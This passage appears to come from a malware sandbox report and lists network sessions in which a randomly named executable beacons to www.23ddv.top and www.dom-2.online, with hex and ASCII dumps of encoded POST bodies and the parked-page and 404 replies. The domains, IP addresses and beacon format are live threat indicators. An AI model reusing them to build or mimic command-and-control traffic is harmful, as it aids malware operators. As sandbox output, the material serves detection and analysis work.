AvLLLbOh=WSi1WyCtnydVLPBeZJgx0adxK6bB6CT97Z0dnXbQC6CCumaljJVmriJq1OD1Q6t08HeoziJKTu4nLLNi8yo44coy+T/ELIAirBqEUrgBs+TaGOcrbyZ/pNX/1f43p6Smcp0NQWsxxPxkwYTp9Hs7l20VIKr5MPVZlPKFQzmBvplmnFrtPkyzoL3uxbeCVCjfrxGt7wn2UdQxZ1/Rcmxn/HBBPGnG9IzRQLSjXlKK3bQo4U7Swt7XMGVXqboKsltqxa+Z5ZW8xeyZ2Iy0tJYPSgwnqvuOKl1Aqs+audXhmfuIu75XTUI9ctWH8Hjm3k4Yv+5QCFToyHn76pZknd0w7qDXiBH6LvhsSeYstewPsgiMPWKBsYVVjjJZqD0SLhBKnmlp2ftkx7f6VX9Qv2OjSfGnSZ8r/1ubVmfDrkGGnuGUjlLp2Jk5cgXjpJ4BfaU/Y2949JoHUXyVZpoy3gKkpqSW419q342r5HL0jVlpV496nchMehzW1Z/RBekTaeRdsH7ijcA380cJf9zhpxhwRjo0/UA8VVrMj5CpcQwKXY6/PpYPzWelzLPTf8BokZl8o5uBfEjE2Rn2SIOvYQlSEboT8lIrdUerYyZA8kkIPYKpp6mdqKSwpvYLV8mHIzvcHhTntMSggw82eQxkm0y5vfzzLdEOe+AEu5x0GEynYA5+qWJNk3I12Ml
Aug 27, 2024 17:49:41.136585951 CEST	5156	OUT	Data Raw: 6c 59 45 73 4b 74 4e 6f 44 79 66 2f 42 73 36 57 55 2b 65 4c 45 58 6a 4f 6c 2f 69 58 4b 67 51 58 73 34 4a 46 4a 38 67 6d 70 48 44 72 34 79 65 71 34 2b 6d 34 34 32 41 35 56 77 54 52 68 45 78 39 48 42 74 68 61 6f 4a 4c 79 56 74 44 62 68 7a 77 7a 6f Data Ascii: lYEsKtNoDyf/Bs6WU+eLEXjOl/iXKgQXs4JFJ8gmpHDr4yeq4+m442A5VwTRhEx9HBthaoJLyVtDbhzwzotuecTjB7da9qHvINRcDVzv+TcddXQoGPaybVbBA6J8+etpXyP7HiHFoZQRi2SxrY5GVGpwNu16CwQ8rcSs0/CPHkhZRDjFC+EwB8n29o+4TMWqyLl74TBuIMwLectMB4tPpwhZP0SJtbTFusAxbLmxArsPq7gBTGD
Aug 27, 2024 17:49:41.136635065 CEST	6445	OUT	Data Raw: 53 51 63 63 64 46 58 5a 76 6c 44 68 57 70 6a 56 59 75 64 6d 41 46 72 6f 75 7a 73 47 7a 56 4c 50 4f 6b 65 2f 71 73 68 42 6e 76 72 6e 61 47 57 77 34 67 67 44 4c 46 4e 4c 4d 38 35 6d 30 31 33 55 66 46 30 6c 74 47 43 73 42 53 4e 7a 71 52 74 4e 66 56 Data Ascii: SQccdFXZvlDhWpjVYudmAFrouzsGzVLPOke/qshBnvrnaGWw4ggDLFNLM85m013UfF0ltGCsBSNzqRtNfV3uC2LhO8RVFSZxCMFx+puHVJ+ye3ZlbRlr0vjaakEr19BAl54QIeEMKU58wAhP7qYYlqUNR26zZWoc4+KJ6kOrvlZ4kMiwEj95uzA0lRka8aC3hDcJdQMmnOB+6afrVmD8cw6KOTp3HNswT94Qhg4AFe8qn/C6c4V
Aug 27, 2024 17:49:41.237365961 CEST	1289	OUT	Data Raw: 2b 6c 74 51 78 69 69 70 36 4a 76 49 55 51 75 63 41 48 6a 55 58 6a 30 71 4f 53 5a 74 52 4d 51 45 30 6e 35 59 78 2f 47 4c 6d 31 74 55 58 2b 4a 74 5a 51 63 68 66 41 67 4e 6a 69 79 56 54 49 62 79 77 6c 4d 49 34 53 72 41 6e 78 57 6c 4b 35 78 65 5a 41 Data Ascii: +ltQxiip6JvIUQucAHjUXj0qOSZtRMQE0n5Yx/GLm1tUX+JtZQchfAgNjiyVTIbywlMI4SrAnxWlK5xeZAjtW7a9GE8wbW8Ej15ifI/bDm1DdTbQ1MxWUVNajWw1uIXk48Y2qLa2UM7IctuPRPrkTNxIoUp0pQb+aQutPB4WkWZkO8YQjJKU5jkF6xERlcvoZuH2QZvjD2kSq7vdLGE2bd/zhESuowycKC/Q/BozYr2UeBLaxdE
Aug 27, 2024 17:49:41.237415075 CEST	1289	OUT	Data Raw: 59 30 68 74 4c 39 4a 33 74 56 4a 76 44 66 4b 58 62 6b 62 4b 66 6a 4f 77 4c 68 41 31 66 64 45 55 74 6c 2b 52 52 68 6e 61 74 6c 4e 38 44 69 42 70 38 38 65 50 6f 64 4f 6b 6c 54 64 45 31 32 37 52 2b 35 64 77 2b 57 78 76 57 43 49 31 63 34 32 7a 6f 61 Data Ascii: Y0htL9J3tVJvDfKXbkbKfjOwLhA1fdEUtl+RRhnatlN8DiBp88ePodOklTdE127R+5dw+WxvWCI1c42zoa8Kj3rl0O2jodKW5hh76KEI9EYzN5LvCP1ejdkQDlKljU7KZBJvdz3GFjOYzB+otcX8PzJrngr5oJ89J1oTjo7b4zP6pyNH4U/ZD9M8VFHtjLx4o+7cSbPglKK0JjeYFsdXutwjna9UKQoWEUpEbsIEPVdxjppn8US
Aug 27, 2024 17:49:41.237495899 CEST	2578	OUT	Data Raw: 62 73 2b 4c 57 7a 7a 66 73 6a 43 64 48 56 79 67 50 32 39 54 66 64 74 70 6d 4e 71 41 51 35 6c 76 6b 7a 77 53 79 49 32 74 79 53 67 72 38 62 4c 36 70 34 5a 79 61 38 4d 78 46 57 79 4e 43 38 2b 6e 62 48 36 77 35 65 72 59 77 53 58 55 68 37 5a 47 64 4f Data Ascii: bs+LWzzfsjCdHVygP29TfdtpmNqAQ5lvkzwSyI2tySgr8bL6p4Zya8MxFWyNC8+nbH6w5erYwSXUh7ZGdO5Sr21wuV2e9CNVeGIooTFjqhz1Jt3imMmeOXPj2yUf5S/LBYgCgresWj15Pm2gDUaWV+L/OIWPTRkxoAetH8oHMjS1WarHHB0sNJ4yanLfvweBy2czHsX4vVVRyv/685dqzr9EKodBuDnFzHq9ZuOnn6puNjPtcSo
Aug 27, 2024 17:49:41.237826109 CEST	10312	OUT	Data Raw: 67 4c 4f 4d 34 68 76 2f 5a 61 47 67 73 58 78 46 41 35 51 2f 35 4e 68 41 69 64 31 30 2b 67 65 48 6f 44 41 7a 45 4e 7a 57 76 6d 76 44 39 63 64 61 41 35 44 65 34 35 41 4f 63 43 69 35 47 6d 6c 6a 72 51 7a 79 63 71 6c 4b 4e 48 30 30 69 6e 79 72 52 55 Data Ascii: gLOM4hv/ZaGgsXxFA5Q/5NhAid10+geHoDAzENzWvmvD9cdaA5De45AOcCi5GmljrQzycqlKNH00inyrRUzdGDsIj2+GA4SWcExRedQ2W+C7VpMCFajM87MOnVFCVKyQT6AwZ+pcLT0yddpRFm3P51UQrFdscHpChKMlJB0ZeIM9LMn6gjFX42A3FtSZTsdck0jEIGmg6I9pfFS7onGhlqz2f7IvkZqZ0S8dNEpyvwnfji1OPQb
Aug 27, 2024 17:49:41.237993956 CEST	10312	OUT	Data Raw: 42 2b 62 50 67 78 6d 32 2b 38 37 56 38 42 70 36 63 49 36 61 34 6f 68 70 4c 4c 37 59 4a 6b 41 2f 73 6e 47 7a 6c 57 31 4a 61 59 6f 42 67 54 47 44 59 71 4a 35 52 4e 34 2b 48 43 33 6d 43 77 31 37 54 6a 6d 7a 52 39 6b 43 52 77 45 6b 77 45 42 33 70 6e Data Ascii: B+bPgxm2+87V8Bp6cI6a4ohpLL7YJkA/snGzlW1JaYoBgTGDYqJ5RN4+HC3mCw17TjmzR9kCRwEkwEB3pnvNXg8IcSJujT1JocAQaufVjsjBKVgi/gCyXuCY44u9RDgQAAhGOH7UnMwcdRL4zj8fsKWMF3ej/Repd+R5qdghsj4657MdiDwBYO07en0PxzadjZXb3toNYbXN3MmjgVidcwewDq6yWIQVRdtblAKBz0VikfIshU9
Aug 27, 2024 17:49:41.339080095 CEST	1289	OUT	Data Raw: 54 36 4f 57 56 4a 56 47 56 31 75 32 41 46 6b 69 52 4f 31 51 62 74 66 32 59 4c 55 56 52 6b 73 52 58 4c 44 51 4e 43 30 52 51 36 47 49 56 4b 76 51 72 46 66 79 6d 79 65 59 77 38 6b 2f 39 78 56 57 4b 4d 4a 61 51 77 6e 58 55 36 41 79 51 78 55 57 6c 58 Data Ascii: T6OWVJVGV1u2AFkiRO1Qbtf2YLUVRksRXLDQNC0RQ6GIVKvQrFfymyeYw8k/9xVWKMJaQwnXU6AyQxUWlXfkY7irMha0Y06zoxGDEPaKujB2gOHTPOW5G8PtijHemB6GAob09E5DDi0wCRNlZfQlntNZhFEGJ0730gLbBYtXKQaWAstq7nvwD1UPmPXhS9/t8yfAZJvbEHoH9v8kBmQ4QdXzbmljXuDwL3qWnIPEf8FsqSUFqyY
Aug 27, 2024 17:49:41.339129925 CEST	3867	OUT	Data Raw: 57 56 6a 4a 34 4f 52 63 49 63 53 32 79 67 39 67 73 71 32 4a 54 39 4c 50 30 43 6b 53 70 2f 7a 63 35 38 32 57 6b 59 59 65 53 68 4f 43 39 66 6f 76 44 46 75 39 6a 52 32 48 36 42 59 72 73 45 68 33 52 4d 73 31 5a 33 77 70 5a 36 45 44 6f 41 54 46 64 79 Data Ascii: WVjJ4ORcIcS2yg9gsq2JT9LP0CkSp/zc582WkYYeShOC9fovDFu9jR2H6BYrsEh3RMs1Z3wpZ6EDoATFdyyNObiwLJYAa+kzIYsE91IVpRa4f8vY7UeBOAWxxgLUueVpknIMNmkhufE//tZQcfMT0nsJpBjMcKkz9sVpE3fzDs2BY89Cy+tu/arHMZuL/9kmQrnUCrUobuKsJ7VGmm1sLzkVpR5TH5VNgPwJ6DoGkTE9jwJzpj1
Aug 27, 2024 17:49:41.339176893 CEST	2578	OUT	Data Raw: 63 36 6f 4b 52 57 30 32 49 31 6b 6e 2b 4a 69 71 67 66 59 30 74 47 31 50 67 73 65 6d 6f 4e 32 7a 4a 45 4c 45 35 4c 6a 76 72 31 42 66 30 61 6b 4c 45 37 62 52 6e 4e 6a 71 2b 4a 59 6a 6f 51 44 48 66 70 45 75 36 75 66 52 45 77 42 6c 52 50 51 6b 37 41 Data Ascii: c6oKRW02I1kn+JiqgfY0tG1PgsemoN2zJELE5Ljvr1Bf0akLE7bRnNjq+JYjoQDHfpEu6ufREwBlRPQk7Ai7r69LxCA34who8qiJ19c4Vcq9m01LyRLh3WPm/TzL77bAlWDp626hRajPo9S0BeDtw8x6zECpmoMbiKNlOJPRzI2RTck14jYfksKP1O6BWBMmlpvLtmiiQrTr33j5Y3bQHZj07vFKjVHliQBkpKV6kjoxEFfGZ/j
Aug 27, 2024 17:49:41.442161083 CEST	1200	IN	HTTP/1.1 200 OK date: Tue, 27 Aug 2024 15:49:40 GMT content-type: text/html; charset=utf-8 content-length: 1114 x-request-id: 3892ca3b-07d4-44ae-a8e6-61eeb0691390 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA== set-cookie: parking_session=3892ca3b-07d4-44ae-a8e6-61eeb0691390; expires=Tue, 27 Aug 2024 16:04:41 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 70 5a 69 6b 41 53 67 58 42 53 65 5a 73 34 6c 35 4f 70 52 46 47 78 31 56 76 45 4f 45 58 57 35 58 4a 54 53 4d 43 35 75 79 78 77 66 41 57 6a 65 41 57 6f 5a 62 63 57 4e 36 49 48 31 45 58 71 67 78 64 35 33 39 62 51 78 4c 48 54 7a 56 36 68 46 45 78 42 37 75 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LpZikASgXBSeZs4l5OpRFGx1VvEOEXW5XJTSMC5uyxwfAWjeAWoZbcWN6IH1EXqgxd539bQxLHTzV6hFExB7uA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49851	199.59.243.226	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:43.773133993 CEST	525	OUT	GET /i0bg/?AvLLLbOh=bQKVVFfanjNZBfdcIZop/p51Kq/q4DLd8P4GjEmXCojBwWm3h7h09nlNydz6D8la1AjIsgIaNvk5Cs0Spg0Y+chR33DfPPxX8Qm8eqAyl/PDJccbAQNQv5M=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.dom-2.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:49:43.875366926 CEST	1200	IN	HTTP/1.1 200 OK date: Tue, 27 Aug 2024 15:49:43 GMT content-type: text/html; charset=utf-8 content-length: 1466 x-request-id: 39f3b7e9-f30f-4c17-b0cf-c2297fb8800b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UjP4LAlmUK/J1S+oj35haTRPI6Q1/+XzWFOjH1KVsgQ+hIoP+pJ4Vm2IzA62sbhOJhbD+ltghXcS2ytKqQmTcg== set-cookie: parking_session=39f3b7e9-f30f-4c17-b0cf-c2297fb8800b; expires=Tue, 27 Aug 2024 16:04:43 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 55 6a 50 34 4c 41 6c 6d 55 4b 2f 4a 31 53 2b 6f 6a 33 35 68 61 54 52 50 49 36 51 31 2f 2b 58 7a 57 46 4f 6a 48 31 4b 56 73 67 51 2b 68 49 6f 50 2b 70 4a 34 56 6d 32 49 7a 41 36 32 73 62 68 4f 4a 68 62 44 2b 6c 74 67 68 58 63 53 32 79 74 4b 71 51 6d 54 63 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_UjP4LAlmUK/J1S+oj35haTRPI6Q1/+XzWFOjH1KVsgQ+hIoP+pJ4Vm2IzA62sbhOJhbD+ltghXcS2ytKqQmTcg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
Aug 27, 2024 17:49:43.875493050 CEST	955	IN	Data Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzlmM2I3ZTktZjMwZi00YzE3LWIwY2YtYzIyOTdmYj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	49852	154.23.184.218	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:57.417598963 CEST	779	OUT	POST /y2fc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.23ddv.top Origin: http://www.23ddv.top Referer: http://www.23ddv.top/y2fc/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 30 62 68 51 56 4b 48 67 51 38 61 54 57 53 39 54 6a 49 74 74 56 7a 64 5a 4a 79 33 50 62 42 71 69 53 7a 45 70 34 4b 2b 51 39 65 66 43 72 66 2b 6c 44 61 64 68 7a 78 4d 4e 4c 32 57 6d 42 5a 63 68 2f 7a 43 37 47 79 43 7a 61 42 30 64 70 4d 31 43 57 41 53 73 71 61 54 46 64 57 46 7a 2b 70 37 4e 47 38 63 44 4a 52 59 44 66 51 6c 37 67 74 34 4a 74 55 65 52 53 53 49 7a 48 73 47 54 31 4c 58 35 44 56 63 45 34 44 78 42 41 57 63 6b 49 2b 70 48 33 51 61 6c 4c 55 72 46 66 51 50 43 52 5a 50 33 46 57 56 4a 56 39 78 35 61 6a 74 38 6c 56 38 76 55 71 5a 69 36 2b 33 57 56 6d 70 63 38 79 4e 50 35 41 3d 3d Data Ascii: AvLLLbOh=0bhQVKHgQ8aTWS9TjIttVzdZJy3PbBqiSzEp4K+Q9efCrf+lDadhzxMNL2WmBZch/zC7GyCzaB0dpM1CWASsqaTFdWFz+p7NG8cDJRYDfQl7gt4JtUeRSSIzHsGT1LX5DVcE4DxBAWckI+pH3QalLUrFfQPCRZP3FWVJV9x5ajt8lV8vUqZi6+3WVmpc8yNP5A==
Aug 27, 2024 17:49:57.726274014 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:49:57 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	49853	154.23.184.218	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:00.275250912 CEST	1119	OUT	POST /y2fc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.23ddv.top Origin: http://www.23ddv.top Referer: http://www.23ddv.top/y2fc/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 30 62 68 51 56 4b 48 67 51 38 61 54 5a 52 6c 54 76 50 42 74 64 7a 64 61 46 53 33 50 55 68 71 2b 53 7a 34 70 34 4c 4c 4c 38 72 33 43 72 2f 4f 6c 43 62 64 68 79 78 4d 4e 41 57 58 69 65 4a 63 36 2f 7a 4f 7a 47 7a 2b 7a 61 46 55 64 37 76 74 43 52 77 53 72 6c 4b 54 47 55 32 46 32 6f 5a 37 58 47 38 67 68 4a 51 38 44 63 6a 78 37 36 72 6b 4a 70 42 71 4f 57 79 49 39 42 73 47 51 2b 72 58 37 44 55 68 78 34 44 35 52 41 6b 41 6b 49 64 68 48 35 77 61 36 65 55 72 43 57 77 4f 4e 57 5a 44 2f 41 46 77 30 5a 73 67 6e 51 6a 42 48 70 57 4d 4f 56 62 31 4c 6f 62 32 76 63 32 51 65 2b 47 55 49 6a 6e 63 69 71 75 6a 7a 7a 58 4c 70 75 53 6e 76 73 75 52 4a 54 35 6c 39 74 57 42 5a 79 47 67 4d 30 4b 61 53 76 4c 36 63 54 73 62 61 31 49 32 67 6c 51 35 52 45 77 4b 70 70 49 37 4a 72 31 56 51 54 79 70 2b 39 73 55 64 4d 44 71 78 70 58 61 54 53 4e 73 73 53 6b 7a 35 32 42 58 56 6a 55 77 37 37 46 41 76 70 76 65 4d 59 62 72 50 63 78 36 55 65 49 45 47 66 39 32 65 79 58 71 62 38 38 36 48 76 6e 4d 70 42 31 76 6a 52 [TRUNCATED] Data Ascii: AvLLLbOh=0bhQVKHgQ8aTZRlTvPBtdzdaFS3PUhq+Sz4p4LLL8r3Cr/OlCbdhyxMNAWXieJc6/zOzGz+zaFUd7vtCRwSrlKTGU2F2oZ7XG8ghJQ8Dcjx76rkJpBqOWyI9BsGQ+rX7DUhx4D5RAkAkIdhH5wa6eUrCWwONWZD/AFw0ZsgnQjBHpWMOVb1Lob2vc2Qe+GUIjnciqujzzXLpuSnvsuRJT5l9tWBZyGgM0KaSvL6cTsba1I2glQ5REwKppI7Jr1VQTyp+9sUdMDqxpXaTSNssSkz52BXVjUw77FAvpveMYbrPcx6UeIEGf92eyXqb886HvnMpB1vjRJNZGnvkS8mx3I/lPmQJ0OKzJuzm1SEHZuZ+pO60e/4A5YHfKdOZICeKLv8DAyUw/qjWzr8mlD5a/0OGr9K/iyz7DWbnCm3yzipAZ5Goa4mcbJrwvNfulizV9YAPzxUZCDDe6GSQoVzPod57IjQQnURgQuFkd/3yIMw5nAvMMZSIojSRRIJmkUmqcTPzJ/GI37aaXoB1WyTiBmw=
Aug 27, 2024 17:50:00.598558903 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:00 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	49854	154.23.184.218	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:03.142137051 CEST	9023	OUT	POST /y2fc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.23ddv.top Origin: http://www.23ddv.top Referer: http://www.23ddv.top/y2fc/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 30 62 68 51 56 4b 48 67 51 38 61 54 5a 52 6c 54 76 50 42 74 64 7a 64 61 46 53 33 50 55 68 71 2b 53 7a 34 70 34 4c 4c 4c 38 74 76 43 72 4d 32 6c 4e 59 31 68 31 78 4d 4e 63 47 58 68 65 4a 64 67 2f 79 6d 33 47 7a 79 6a 61 48 73 64 37 39 46 43 51 43 4b 72 75 61 54 48 52 32 46 77 2b 70 37 44 47 38 63 4c 4a 51 59 35 66 51 74 37 67 70 38 4a 6a 57 47 52 65 43 49 7a 42 73 47 63 36 72 58 46 44 56 55 32 34 44 31 52 41 6d 30 6b 49 6f 6c 48 36 6e 4f 36 47 30 72 42 5a 51 4f 53 63 35 43 50 41 46 6c 46 5a 73 68 61 51 6d 78 48 70 55 45 4f 55 59 64 4d 6f 37 32 76 55 57 51 5a 36 47 52 42 6a 6b 70 78 71 76 48 7a 7a 51 58 70 76 79 6e 76 70 50 52 47 55 5a 6c 37 36 47 42 77 32 47 6b 45 30 4b 4f 34 76 4b 65 63 54 38 50 61 33 2f 71 67 6e 79 64 52 4e 77 4b 38 30 59 37 67 68 56 56 4d 54 79 35 59 39 73 30 6e 4d 42 6d 78 70 7a 47 54 41 63 73 7a 55 45 7a 2f 71 52 57 50 79 45 38 6e 37 46 51 4e 70 76 65 63 59 61 66 50 66 46 47 55 66 4b 73 46 50 39 32 5a 34 48 71 4f 6e 4d 6d 4e 76 6e 35 6b 42 31 33 7a 52 [TRUNCATED] Data Ascii: 